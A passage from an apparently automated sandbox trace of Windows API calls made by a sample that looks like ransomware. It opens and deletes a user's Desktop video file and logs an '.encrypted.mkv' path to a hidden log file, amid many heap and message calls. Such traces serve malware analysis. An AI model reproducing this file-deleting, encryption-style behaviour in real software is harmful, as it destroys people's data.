returned 0 [0030.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.376] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.376] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\prtmxaa65jvr0xt.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0030.376] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.376] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.376] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.376] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.377] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.377] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.377] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.377] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.377] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.377] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.377] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", lpFilePart=0x0) returned 0x39 [0030.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8276fa90, ftCreationTime.dwHighDateTime=0x1d5bada, ftLastAccessTime.dwLowDateTime=0x58a2bd00, ftLastAccessTime.dwHighDateTime=0x1d5ba83, ftLastWriteTime.dwLowDateTime=0x11fcd3c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x140b1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="pRtMXaA65Jvr0xt.mkv", cAlternateFileName="PRTMXA~1.MKV")) returned 0x7c2100 [0030.378] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\prtmxaa65jvr0xt.mkv")) returned 1 [0030.379] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8276fa90, ftCreationTime.dwHighDateTime=0x1d5bada, ftLastAccessTime.dwLowDateTime=0x58a2bd00, ftLastAccessTime.dwHighDateTime=0x1d5ba83, ftLastWriteTime.dwLowDateTime=0x11fcd3c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x140b1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="pRtMXaA65Jvr0xt.mkv", cAlternateFileName="PRTMXA~1.MKV")) returned 0 [0030.380] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.380] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.380] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.380] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.380] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.380] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.380] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.381] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.381] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.381] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.381] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.381] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.381] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.381] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.381] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.381] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x369, lpOverlapped=0x0) returned 1 [0030.381] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.381] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x369, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.381] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.encrypted.mkv\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0030.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x46) returned 0x88e138 [0030.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.encrypted.mkv\r\n", cchWideChar=70, lpMultiByteStr=0x88e138, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 70 [0030.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0030.382] WriteFile (in: hFile=0x140, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x45, lpOverlapped=0x0) returned 1 [0030.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.382] CloseHandle (hObject=0x140) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.383] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.383] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.384] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.384] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.384] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.385] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.385] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 